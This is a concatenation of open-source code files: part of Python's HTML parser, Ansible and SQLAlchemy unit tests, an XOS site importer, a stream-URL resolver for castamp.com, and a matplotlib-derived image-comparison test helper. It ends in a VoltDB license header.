if i == n: break
startswith = rawdata.startswith
if startswith('<', i):
if starttagopen.match(rawdata, i): # < + letter
k = self.parse_starttag(i)
elif startswith("</", i):
k = self.parse_endtag(i)
elif startswith("<!--", i):
k = self.parse_comment(i)
elif startswith("<?", i):
k = self.parse_pi(i)
elif startswith("<!", i):
if self.strict:
k = self.parse_declaration(i)
else:
k = self.parse_html_declaration(i)
elif (i + 1) < n:
self.handle_data("<")
k = i + 1
else:
break
if k < 0:
if not end:
break
if self.strict:
self.error("EOF in middle of construct")
k = rawdata.find('>', i + 1)
if k < 0:
k = rawdata.find('<', i + 1)
if k < 0:
k = i + 1
else:
k += 1
self.handle_data(rawdata[i:k])
i = self.updatepos(i, k)
elif startswith("&#", i):
match = charref.match(rawdata, i)
if match:
name = match.group()[2:-1]
self.handle_charref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
else:
if ";" in rawdata[i:]: #bail by consuming &#
self.handle_data(rawdata[0:2])
i = self.updatepos(i, 2)
break
elif startswith('&', i):
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
match = incomplete.match(rawdata, i)
if match:
# match.group() will contain at least 2 chars
if end and match.group() == rawdata[i:]:
if self.strict:
self.error("EOF in middle of entity or char ref")
else:
k = match.end()
if k <= i:
k = n
i = self.updatepos(i, i + 1)
# incomplete
break
elif (i + 1) < n:
# not the end of the buffer, and can't be confused
# with some other construct
self.handle_data("&")
i = self.updatepos(i, i + 1)
else:
break
else:
assert 0, "interesting.search() lied"
# end while
if end and i < n and not self.cdata_elem:
self.handle_data(rawdata[i:n])
i = self.updatepos(i, n)
self.rawdata = rawdata[i:]
# Internal -- parse html declarations, return length or -1 if not terminated
# See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
# See also parse_declaration in _markupbase
def parse_html_declaration(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<!', ('unexpected call to '
'parse_html_declaration()')
if rawdata[i:i+4] == '<!--':
# this case is actually already handled in goahead()
return self.parse_comment(i)
elif rawdata[i:i+3] == '<![':
return self.parse_marked_section(i)
elif rawdata[i:i+9].lower() == '<!doctype':
# find the closing >
gtpos = rawdata.find('>', i+9)
if gtpos == -1:
return -1
self.handle_decl(rawdata[i+2:gtpos])
return gtpos+1
else:
return self.parse_bogus_comment(i)
# Internal -- parse bogus comment, return length or -1 if not terminated
# see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
def parse_bogus_comment(self, i, report=1):
rawdata = self.rawdata
assert rawdata[i:i+2] in ('<!', '</'), ('unexpected call to '
'parse_comment()')
pos = rawdata.find('>', i+2)
if pos == -1:
return -1
if report:
self.handle_comment(rawdata[i+2:pos])
return pos + 1
# Internal -- parse processing instr, return end or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
match = piclose.search(rawdata, i+2) # >
if not match:
return -1
j = match.start()
self.handle_pi(rawdata[i+2: j])
j = match.end()
return j
# Internal -- handle starttag, return end or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
# Internal -- check to see if we have a complete starttag; return end
# or -1 if incomplete.
def check_for_whole_start_tag(self, i):
rawdata = self.rawdata
if self.strict:
m = locatestarttagend.match(rawdata, i)
else:
m = locatestarttagend_tolerant.match(rawdata, i)
if m:
j = m.end()
next = rawdata[j:j+1]
if next == ">":
return j + 1
if next == "/":
if rawdata.startswith("/>", j):
return j + 2
if rawdata.startswith("/", j):
# buffer boundary
return -1
# else bogus input
if self.strict:
self.updatepos(i, j + 1)
self.error("malformed empty start tag")
if j > i:
return j
else:
return i + 1
if next == "":
# end of input
return -1
if next in ("abcdefghijklmnopqrstuvwxyz=/"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
# end of input in or before attribute value, or we have the
# '/' from a '/>' ending
return -1
if self.strict:
self.updatepos(i, j)
self.error("malformed start tag")
if j > i:
return j
else:
return i + 1
raise AssertionError("we should not get here!")
# Internal -- parse endtag, return end or -1 if incomplete
def parse_endtag(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
match = endendtag.search(rawdata, i+1) # >
if not match:
return -1
gtpos = match.end()
match = endtagfind.match(rawdata, i) # </ + tag + >
if not match:
if self.cdata_elem is not None:
self.handle_data(rawdata[i:gtpos])
return gtpos
if self.strict:
self.error("bad end tag: %r" % (rawdata[i:gtpos],))
# find the name: w3.org/TR/html5/tokenization.html#tag-name-state
namematch = tagfind_tolerant.match(rawdata, i+2)
if not namematch:
# w3.org/TR/html5/tokenization.html#end-tag-open-state
if rawdata[i:i+3] == '</>':
return i+3
else:
return self.parse_bogus_comment(i)
tagname = namematch.group().lower()
# consume and ignore other stuff between the name and the >
# Note: this is not 100% correct, since we might have things like
# </tag attr=">">, but looking for > after tha name should cover
# most of the cases and is much simpler
gtpos = rawdata.find('>', namematch.end())
self.handle_endtag(tagname)
return gtpos+1
elem = match.group(1).lower() # script or style
if self.cdata_elem is not None:
if elem != self.cdata_elem:
self.handle_data(rawdata[i:gtpos])
return gtpos
self.handle_endtag(elem.lower())
self.clear_cdata_mode()
return gtpos
# Overridable -- finish processing of start+end tag: <tag.../>
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
self.handle_endtag(tag)
# Overridable -- handle start tag
def handle_starttag(self, tag, attrs):
pass
# Overridable -- handle end tag
def handle_endtag(self, tag):
pass
# Overridable -- handle character reference
def handle_charref(self, name):
pass
# Overridable -- handle entity reference
def handle_entityref(self, name):
pass
# Overridable -- handle data
def handle_data(self, data):
pass
# Overridable -- handle comment
def handle_comment(self, data):
pass
# Overridable -- handle declaration
def handle_decl(self, decl):
pass
# Overridable -- handle processing instruction
def handle_pi(self, data):
pass
def unknown_decl(self, data):
if self.strict:
self.error("unknown declaration: %r" % (data,))
# Internal -- helper to remove special character quoting
def unescape(self, s):
if '&' not in s:
return s
def replaceEntities(s):
s = s.groups()[0]
try:
if s[0] == "#":
s = s[1:]
if s[0] in ['x','X']:
c = int(s[1:].rstrip(';'), 16)
else:
c = int(s.rstrip(';'))
return chr(c)
except ValueError:
return '&#' + s
else:
from html.entities import html5
if s in html5:
return html5[s]
elif s.endswith(';'):
return '&' + s
for x in range(2, len(s)):
if s[:x] in html5:
return html5[s[:x]] + s[x:]
else:
return '&' + s
return re.sub(r"&(#?[xX]?(?:[0-9a-fA-F]+;|\w{1,32};?))",
replaceEntities, s, flags=re.ASCII)
| gpl-3.0 |
schlueter/ansible | test/units/vars/test_variable_manager.py | 73 | 11541 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from collections import defaultdict
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import MagicMock, mock_open, patch
from ansible.inventory.manager import InventoryManager
from ansible.module_utils.six import iteritems
from ansible.module_utils.six.moves import builtins
from ansible.playbook.play import Play
from units.mock.loader import DictDataLoader
from units.mock.path import mock_unfrackpath_noop
from ansible.vars.manager import VariableManager
class TestVariableManager(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_basic_manager(self):
fake_loader = DictDataLoader({})
mock_inventory = MagicMock()
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
variables = v.get_vars(use_cache=False)
# Check var manager expected values, never check: ['omit', 'vars']
# FIXME: add the following ['ansible_version', 'ansible_playbook_python', 'groups']
for varname, value in (('playbook_dir', os.path.abspath('.')), ):
self.assertEqual(variables[varname], value)
def test_variable_manager_extra_vars(self):
fake_loader = DictDataLoader({})
extra_vars = dict(a=1, b=2, c=3)
mock_inventory = MagicMock()
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
v.extra_vars = extra_vars
vars = v.get_vars(use_cache=False)
for (key, val) in iteritems(extra_vars):
self.assertEqual(vars.get(key), val)
self.assertIsNot(v.extra_vars, extra_vars)
def test_variable_manager_play_vars(self):
fake_loader = DictDataLoader({})
mock_play = MagicMock()
mock_play.get_vars.return_value = dict(foo="bar")
mock_play.get_roles.return_value = []
mock_play.get_vars_files.return_value = []
mock_inventory = MagicMock()
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
self.assertEqual(v.get_vars(play=mock_play, use_cache=False).get("foo"), "bar")
def test_variable_manager_play_vars_files(self):
fake_loader = DictDataLoader({
__file__: """
foo: bar
"""
})
mock_play = MagicMock()
mock_play.get_vars.return_value = dict()
mock_play.get_roles.return_value = []
mock_play.get_vars_files.return_value = [__file__]
mock_inventory = MagicMock()
v = VariableManager(inventory=mock_inventory, loader=fake_loader)
self.assertEqual(v.get_vars(play=mock_play, use_cache=False).get("foo"), "bar")
def test_variable_manager_task_vars(self):
# FIXME: BCS make this work
return
# pylint: disable=unreachable
fake_loader = DictDataLoader({})
mock_task = MagicMock()
mock_task._role = None
mock_task.loop = None
mock_task.get_vars.return_value = dict(foo="bar")
mock_task.get_include_params.return_value = dict()
mock_all = MagicMock()
mock_all.get_vars.return_value = {}
mock_all.get_file_vars.return_value = {}
mock_host = MagicMock()
mock_host.get.name.return_value = 'test01'
mock_host.get_vars.return_value = {}
mock_host.get_host_vars.return_value = {}
mock_inventory = MagicMock()
mock_inventory.hosts.get.return_value = mock_host
mock_inventory.hosts.get.name.return_value = 'test01'
mock_inventory.get_host.return_value = mock_host
mock_inventory.groups.__getitem__.return_value = mock_all
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
self.assertEqual(v.get_vars(task=mock_task, use_cache=False).get("foo"), "bar")
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_variable_manager_precedence(self):
# FIXME: this needs to be redone as dataloader is not the automatic source of data anymore
return
# pylint: disable=unreachable
'''
Tests complex variations and combinations of get_vars() with different
objects to modify the context under which variables are merged.
'''
# FIXME: BCS makethiswork
# return True
mock_inventory = MagicMock()
inventory1_filedata = """
[group2:children]
group1
[group1]
host1 host_var=host_var_from_inventory_host1
[group1:vars]
group_var = group_var_from_inventory_group1
[group2:vars]
group_var = group_var_from_inventory_group2
"""
fake_loader = DictDataLoader({
# inventory1
'/etc/ansible/inventory1': inventory1_filedata,
# role defaults_only1
'/etc/ansible/roles/defaults_only1/defaults/main.yml': """
default_var: "default_var_from_defaults_only1"
host_var: "host_var_from_defaults_only1"
group_var: "group_var_from_defaults_only1"
group_var_all: "group_var_all_from_defaults_only1"
extra_var: "extra_var_from_defaults_only1"
""",
'/etc/ansible/roles/defaults_only1/tasks/main.yml': """
- debug: msg="here i am"
""",
# role defaults_only2
'/etc/ansible/roles/defaults_only2/defaults/main.yml': """
default_var: "default_var_from_defaults_only2"
host_var: "host_var_from_defaults_only2"
group_var: "group_var_from_defaults_only2"
group_var_all: "group_var_all_from_defaults_only2"
extra_var: "extra_var_from_defaults_only2"
""",
})
inv1 = InventoryManager(loader=fake_loader, sources=['/etc/ansible/inventory1'])
v = VariableManager(inventory=mock_inventory, loader=fake_loader)
v._fact_cache = defaultdict(dict)
play1 = Play.load(dict(
hosts=['all'],
roles=['defaults_only1', 'defaults_only2'],
), loader=fake_loader, variable_manager=v)
# first we assert that the defaults as viewed as a whole are the merged results
# of the defaults from each role, with the last role defined "winning" when
# there is a variable naming conflict
res = v.get_vars(play=play1)
self.assertEqual(res['default_var'], 'default_var_from_defaults_only2')
# next, we assert that when vars are viewed from the context of a task within a
# role, that task will see its own role defaults before any other role's
blocks = play1.compile()
task = blocks[1].block[0]
res = v.get_vars(play=play1, task=task)
self.assertEqual(res['default_var'], 'default_var_from_defaults_only1')
# next we assert the precedence of inventory variables
v.set_inventory(inv1)
h1 = inv1.get_host('host1')
res = v.get_vars(play=play1, host=h1)
self.assertEqual(res['group_var'], 'group_var_from_inventory_group1')
self.assertEqual(res['host_var'], 'host_var_from_inventory_host1')
# next we test with group_vars/ files loaded
fake_loader.push("/etc/ansible/group_vars/all", """
group_var_all: group_var_all_from_group_vars_all
""")
fake_loader.push("/etc/ansible/group_vars/group1", """
group_var: group_var_from_group_vars_group1
""")
fake_loader.push("/etc/ansible/group_vars/group3", """
# this is a dummy, which should not be used anywhere
group_var: group_var_from_group_vars_group3
""")
fake_loader.push("/etc/ansible/host_vars/host1", """
host_var: host_var_from_host_vars_host1
""")
fake_loader.push("group_vars/group1", """
playbook_group_var: playbook_group_var
""")
fake_loader.push("host_vars/host1", """
playbook_host_var: playbook_host_var
""")
res = v.get_vars(play=play1, host=h1)
# self.assertEqual(res['group_var'], 'group_var_from_group_vars_group1')
# self.assertEqual(res['group_var_all'], 'group_var_all_from_group_vars_all')
# self.assertEqual(res['playbook_group_var'], 'playbook_group_var')
# self.assertEqual(res['host_var'], 'host_var_from_host_vars_host1')
# self.assertEqual(res['playbook_host_var'], 'playbook_host_var')
# add in the fact cache
v._fact_cache['host1'] = dict(fact_cache_var="fact_cache_var_from_fact_cache")
res = v.get_vars(play=play1, host=h1)
self.assertEqual(res['fact_cache_var'], 'fact_cache_var_from_fact_cache')
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_variable_manager_role_vars_dependencies(self):
'''
Tests vars from role dependencies with duplicate dependencies.
'''
mock_inventory = MagicMock()
fake_loader = DictDataLoader({
# role common-role
'/etc/ansible/roles/common-role/tasks/main.yml': """
- debug: msg="{{role_var}}"
""",
# We do not need allow_duplicates: yes for this role
# because eliminating duplicates is done by the execution
# strategy, which we do not test here.
# role role1
'/etc/ansible/roles/role1/vars/main.yml': """
role_var: "role_var_from_role1"
""",
'/etc/ansible/roles/role1/meta/main.yml': """
dependencies:
- { role: common-role }
""",
# role role2
'/etc/ansible/roles/role2/vars/main.yml': """
role_var: "role_var_from_role2"
""",
'/etc/ansible/roles/role2/meta/main.yml': """
dependencies:
- { role: common-role }
""",
})
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
v._fact_cache = defaultdict(dict)
play1 = Play.load(dict(
hosts=['all'],
roles=['role1', 'role2'],
), loader=fake_loader, variable_manager=v)
# The task defined by common-role exists twice because role1
# and role2 depend on common-role. Check that the tasks see
# different values of role_var.
blocks = play1.compile()
task = blocks[1].block[0]
res = v.get_vars(play=play1, task=task)
self.assertEqual(res['role_var'], 'role_var_from_role1')
task = blocks[2].block[0]
res = v.get_vars(play=play1, task=task)
self.assertEqual(res['role_var'], 'role_var_from_role2')
| gpl-3.0 |
wathsalav/xos | xos/importer/plclassic/site_importer.py | 1 | 1266 | from core.models import Site
class SiteImporter:
def __init__(self, api):
self.api = api
self.remote_sites = {}
self.local_sites = {}
def run(self):
db_sites = Site.objects.all()
for db_site in db_sites:
self.local_sites[db_site.login_base] = db_site
print "%s local sites" % len(db_sites)
sites = self.api.GetSites({'peer_id': None})
print "%s remote sites" % len(sites)
count = 0
for site in sites:
self.remote_sites[site['site_id']] = site
if site['login_base'] not in self.local_sites:
new_site = Site(name=site['name'],
login_base=site['login_base'],
site_url=site['url'],
enabled=site['enabled'],
longitude=site['longitude'],
latitude=site['latitude'],
is_public=site['is_public'],
abbreviated_name=site['abbreviated_name'])
new_site.save()
count += 1
self.local_sites[new_site.login_base] = new_site
print "imported %s sites" % count
| apache-2.0 |
bootandy/sqlalchemy | test/aaa_profiling/test_resultset.py | 23 | 4577 | from sqlalchemy import MetaData, Table, Column, String, Unicode, Integer, \
create_engine
from sqlalchemy.testing import fixtures, AssertsExecutionResults, profiling
from sqlalchemy import testing
from sqlalchemy.testing import eq_
from sqlalchemy.util import u
from sqlalchemy.engine.result import RowProxy
import sys
NUM_FIELDS = 10
NUM_RECORDS = 1000
t = t2 = metadata = None
class ResultSetTest(fixtures.TestBase, AssertsExecutionResults):
__backend__ = True
@classmethod
def setup_class(cls):
global t, t2, metadata
metadata = MetaData(testing.db)
t = Table('table', metadata, *[Column('field%d' % fnum, String(50))
for fnum in range(NUM_FIELDS)])
t2 = Table(
'table2', metadata, *
[Column('field%d' % fnum, Unicode(50))
for fnum in range(NUM_FIELDS)])
def setup(self):
metadata.create_all()
t.insert().execute([dict(('field%d' % fnum, u('value%d' % fnum))
for fnum in range(NUM_FIELDS)) for r_num in
range(NUM_RECORDS)])
t2.insert().execute([dict(('field%d' % fnum, u('value%d' % fnum))
for fnum in range(NUM_FIELDS)) for r_num in
range(NUM_RECORDS)])
# warm up type caches
t.select().execute().fetchall()
t2.select().execute().fetchall()
def teardown(self):
metadata.drop_all()
@profiling.function_call_count()
def test_string(self):
[tuple(row) for row in t.select().execute().fetchall()]
@profiling.function_call_count()
def test_unicode(self):
[tuple(row) for row in t2.select().execute().fetchall()]
def test_contains_doesnt_compile(self):
row = t.select().execute().first()
c1 = Column('some column', Integer) + \
Column("some other column", Integer)
@profiling.function_call_count()
def go():
c1 in row
go()
class ExecutionTest(fixtures.TestBase):
__backend__ = True
def test_minimal_connection_execute(self):
# create an engine without any instrumentation.
e = create_engine('sqlite://')
c = e.connect()
# ensure initial connect activities complete
c.execute("select 1")
@profiling.function_call_count()
def go():
c.execute("select 1")
go()
def test_minimal_engine_execute(self, variance=0.10):
# create an engine without any instrumentation.
e = create_engine('sqlite://')
# ensure initial connect activities complete
e.execute("select 1")
@profiling.function_call_count()
def go():
e.execute("select 1")
go()
class RowProxyTest(fixtures.TestBase):
__requires__ = 'cpython',
__backend__ = True
def _rowproxy_fixture(self, keys, processors, row):
class MockMeta(object):
def __init__(self):
pass
metadata = MockMeta()
keymap = {}
for index, (keyobjs, processor, values) in \
enumerate(list(zip(keys, processors, row))):
for key in keyobjs:
keymap[key] = (processor, key, index)
keymap[index] = (processor, key, index)
return RowProxy(metadata, row, processors, keymap)
def _test_getitem_value_refcounts(self, seq_factory):
col1, col2 = object(), object()
def proc1(value):
return value
value1, value2 = "x", "y"
row = self._rowproxy_fixture(
[(col1, "a"), (col2, "b")],
[proc1, None],
seq_factory([value1, value2])
)
v1_refcount = sys.getrefcount(value1)
v2_refcount = sys.getrefcount(value2)
for i in range(10):
row[col1]
row["a"]
row[col2]
row["b"]
row[0]
row[1]
row[0:2]
eq_(sys.getrefcount(value1), v1_refcount)
eq_(sys.getrefcount(value2), v2_refcount)
def test_value_refcounts_pure_tuple(self):
self._test_getitem_value_refcounts(tuple)
def test_value_refcounts_custom_seq(self):
class CustomSeq(object):
def __init__(self, data):
self.data = data
def __getitem__(self, item):
return self.data[item]
def __iter__(self):
return iter(self.data)
self._test_getitem_value_refcounts(CustomSeq)
| mit |
dannyperry571/theapprentice | script.module.liveresolver/lib/liveresolver/resolvers/castamp.py | 10 | 1405 | # -*- coding: utf-8 -*-
import re,urllib,urlparse,base64
from liveresolver.modules import client,constants
from liveresolver.modules.log_utils import log
def resolve(url):
try:
id = urlparse.parse_qs(urlparse.urlparse(url).query)['c'][0]
try:
referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except:
referer= url
url = 'http://castamp.com/embed.php?c=%s&vwidth=640&vheight=380'%id
pageUrl=url
result = client.request(url, referer=referer,headers = {'Host':'www.castamp.com'})
result = urllib.unquote(result).replace('unescape(','').replace("'+'",'')
rplcs = re.findall('=(.+?).replace\([\"\'](.+?)[\"\']\s*,\s*[\"\']([^\"\']*)[\"\']',result)
result = re.sub('\/\*[^*]+\*\/','',result)
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
file = re.compile('\'file\'\s*:\s*(.+?),').findall(result)[-1]
file = var_dict[file]
rtmp = re.compile('(rtmp://[^\"\']+)').findall(result)[0]
for r in rplcs:
file = file.replace(r[1],r[2])
url = rtmp + ' playpath=' + file + ' swfUrl=http://p.castamp.com/cplayer.swf' + ' flashver=' + constants.flash_ver() + ' live=true timeout=15 swfVfy=1 pageUrl=' + pageUrl
return url
except:
return
| gpl-2.0 |
craffel/mir_eval | tests/mpl_ic.py | 3 | 12171 | # CREATED:2015-02-17 14:41:28 by Brian McFee <brian.mcfee@nyu.edu>
# this function is lifted wholesale from matploblib v1.4.2,
# and modified so that images are stored explicitly under the tests path
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
import functools
import gc
import os
import sys
import shutil
import warnings
import unittest
import nose
import numpy as np
import matplotlib.units
from matplotlib import cbook
from matplotlib import ticker
from matplotlib import pyplot as plt
from matplotlib import ft2font
from matplotlib.testing.noseclasses import KnownFailure
from matplotlib.testing.exceptions import ImageComparisonFailure
from matplotlib.testing.compare import comparable_formats, compare_images, \
make_test_filename
def knownfailureif(fail_condition, msg=None, known_exception_class=None):
"""
Assume a will fail if *fail_condition* is True. *fail_condition*
may also be False or the string 'indeterminate'.
*msg* is the error message displayed for the test.
If *known_exception_class* is not None, the failure is only known
if the exception is an instance of this class. (Default = None)
"""
# based on numpy.testing.dec.knownfailureif
if msg is None:
msg = 'Test known to fail'
def known_fail_decorator(f):
# Local import to avoid a hard nose dependency and only incur the
# import time overhead at actual test-time.
import nose
def failer(*args, **kwargs):
try:
# Always run the test (to generate images).
result = f(*args, **kwargs)
except Exception as err:
if fail_condition:
if known_exception_class is not None:
if not isinstance(err, known_exception_class):
# This is not the expected exception
raise
# (Keep the next ultra-long comment so in shows in
# console.)
# An error here when running nose means that you don't have
# the matplotlib.testing.noseclasses:KnownFailure plugin in
# use.
raise KnownFailure(msg)
else:
raise
if fail_condition and fail_condition != 'indeterminate':
raise KnownFailureDidNotFailTest(msg)
return result
return nose.tools.make_decorator(f)(failer)
return known_fail_decorator
def _do_cleanup(original_units_registry):
plt.close('all')
gc.collect()
import matplotlib.testing
matplotlib.testing.setup()
matplotlib.units.registry.clear()
matplotlib.units.registry.update(original_units_registry)
warnings.resetwarnings() # reset any warning filters set in tests
class KnownFailureDidNotFailTest(KnownFailure):
pass
class CleanupTest(object):
@classmethod
def setup_class(cls):
cls.original_units_registry = matplotlib.units.registry.copy()
@classmethod
def teardown_class(cls):
_do_cleanup(cls.original_units_registry)
def test(self):
self._func()
class CleanupTestCase(unittest.TestCase):
'''A wrapper for unittest.TestCase that includes cleanup operations'''
@classmethod
def setUpClass(cls):
import matplotlib.units
cls.original_units_registry = matplotlib.units.registry.copy()
@classmethod
def tearDownClass(cls):
_do_cleanup(cls.original_units_registry)
def cleanup(func):
@functools.wraps(func)
def wrapped_function(*args, **kwargs):
original_units_registry = matplotlib.units.registry.copy()
try:
func(*args, **kwargs)
finally:
_do_cleanup(original_units_registry)
return wrapped_function
def check_freetype_version(ver):
if ver is None:
return True
from distutils import version
if isinstance(ver, six.string_types):
ver = (ver, ver)
ver = [version.StrictVersion(x) for x in ver]
found = version.StrictVersion(ft2font.__freetype_version__)
return found >= ver[0] and found <= ver[1]
class ImageComparisonTest(CleanupTest):
@classmethod
def setup_class(cls):
CleanupTest.setup_class()
cls._func()
@staticmethod
def remove_text(figure):
figure.suptitle("")
for ax in figure.get_axes():
ax.set_title("")
ax.xaxis.set_major_formatter(ticker.NullFormatter())
ax.xaxis.set_minor_formatter(ticker.NullFormatter())
ax.yaxis.set_major_formatter(ticker.NullFormatter())
ax.yaxis.set_minor_formatter(ticker.NullFormatter())
try:
ax.zaxis.set_major_formatter(ticker.NullFormatter())
ax.zaxis.set_minor_formatter(ticker.NullFormatter())
except AttributeError:
pass
def test(self):
baseline_dir, result_dir = _image_directories(self._func)
for fignum, baseline in zip(plt.get_fignums(), self._baseline_images):
for extension in self._extensions:
will_fail = extension not in comparable_formats()
if will_fail:
fail_msg = ('Cannot compare %s files on this system' %
extension)
else:
fail_msg = 'No failure expected'
orig_expected_fname = (
os.path.join(baseline_dir, baseline) + '.' + extension)
if (extension == 'eps' and
not os.path.exists(orig_expected_fname)):
orig_expected_fname = (
os.path.join(baseline_dir, baseline) + '.pdf')
expected_fname = make_test_filename(os.path.join(
result_dir,
os.path.basename(orig_expected_fname)), 'expected')
actual_fname = (
os.path.join(result_dir, baseline) + '.' + extension)
if os.path.exists(orig_expected_fname):
shutil.copyfile(orig_expected_fname, expected_fname)
else:
will_fail = True
fail_msg = 'Do not have baseline image %s' % expected_fname
@knownfailureif(
will_fail, fail_msg,
known_exception_class=ImageComparisonFailure)
def do_test():
figure = plt.figure(fignum)
if self._remove_text:
self.remove_text(figure)
figure.savefig(actual_fname, **self._savefig_kwarg)
plt.close(figure)
err = compare_images(expected_fname, actual_fname,
self._tol, in_decorator=True)
try:
if not os.path.exists(expected_fname):
raise ImageComparisonFailure(
'image does not exist: %s' % expected_fname)
if err:
raise ImageComparisonFailure(
'images not close: %(actual)s vs. %(expected)s'
' (RMS %(rms).3f)' % err)
except ImageComparisonFailure:
if not check_freetype_version(self._freetype_version):
raise KnownFailure(
"Mismatched version of freetype. Test "
"requires '%s', you have '%s'" %
(self._freetype_version,
ft2font.__freetype_version__))
raise
yield (do_test,)
def image_comparison(baseline_images=None, extensions=None, tol=13,
freetype_version=None, remove_text=False,
savefig_kwarg=None):
"""
call signature::
image_comparison(baseline_images=['my_figure'], extensions=None)
Compare images generated by the test with those specified in
*baseline_images*, which must correspond else an
ImageComparisonFailure exception will be raised.
Keyword arguments:
*baseline_images*: list
A list of strings specifying the names of the images generated
by calls to :meth:`matplotlib.figure.savefig`.
*extensions*: [ None | list ]
If *None*, default to all supported extensions.
Otherwise, a list of extensions to test. For example ['png','pdf'].
*tol*: (default 13)
The RMS threshold above which the test is considered failed.
*freetype_version*: str or tuple
The expected freetype version or range of versions for this
test to pass.
*remove_text*: bool
Remove the title and tick text from the figure before
comparison. This does not remove other, more deliberate,
text, such as legends and annotations.
*savefig_kwarg*: dict
Optional arguments that are passed to the savefig method.
"""
if baseline_images is None:
raise ValueError('baseline_images must be specified')
if extensions is None:
# default extensions to test
extensions = ['png', 'pdf', 'svg']
if savefig_kwarg is None:
# default no kwargs to savefig
savefig_kwarg = dict()
def compare_images_decorator(func):
# We want to run the setup function (the actual test function
# that generates the figure objects) only once for each type
# of output file. The only way to achieve this with nose
# appears to be to create a test class with "setup_class" and
# "teardown_class" methods. Creating a class instance doesn't
# work, so we use type() to actually create a class and fill
# it with the appropriate methods.
name = func.__name__
# For nose 1.0, we need to rename the test function to
# something without the word "test", or it will be run as
# well, outside of the context of our image comparison test
# generator.
func = staticmethod(func)
func.__get__(1).__name__ = str('_private')
new_class = type(
name,
(ImageComparisonTest,),
{'_func': func,
'_baseline_images': baseline_images,
'_extensions': extensions,
'_tol': tol,
'_freetype_version': freetype_version,
'_remove_text': remove_text,
'_savefig_kwarg': savefig_kwarg})
return new_class
return compare_images_decorator
def _image_directories(func):
"""
Compute the baseline and result image directories for testing *func*.
Create the result directory if it doesn't exist.
"""
module_name = func.__module__
# mods = module_name.split('.')
# mods.pop(0) # <- will be the name of the package being tested (in
# most cases "matplotlib")
# assert mods.pop(0) == 'tests'
# subdir = os.path.join(*mods)
subdir = module_name
import imp
def find_dotted_module(module_name, path=None):
"""A version of imp which can handle dots in the module name"""
res = None
for sub_mod in module_name.split('.'):
try:
res = file, path, _ = imp.find_module(sub_mod, path)
path = [path]
if file is not None:
file.close()
except ImportError:
# assume namespace package
path = sys.modules[sub_mod].__path__
res = None, path, None
return res
mod_file = find_dotted_module(func.__module__)[1]
basedir = os.path.dirname(mod_file)
baseline_dir = os.path.join(basedir, 'baseline_images', subdir)
result_dir = os.path.abspath(os.path.join('result_images', subdir))
if not os.path.exists(result_dir):
cbook.mkdirs(result_dir)
return baseline_dir, result_dir
| mit |
zheguang/voltdb | src/catgen/catalog_utils/__init__.py | 2 | 1341 | #!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
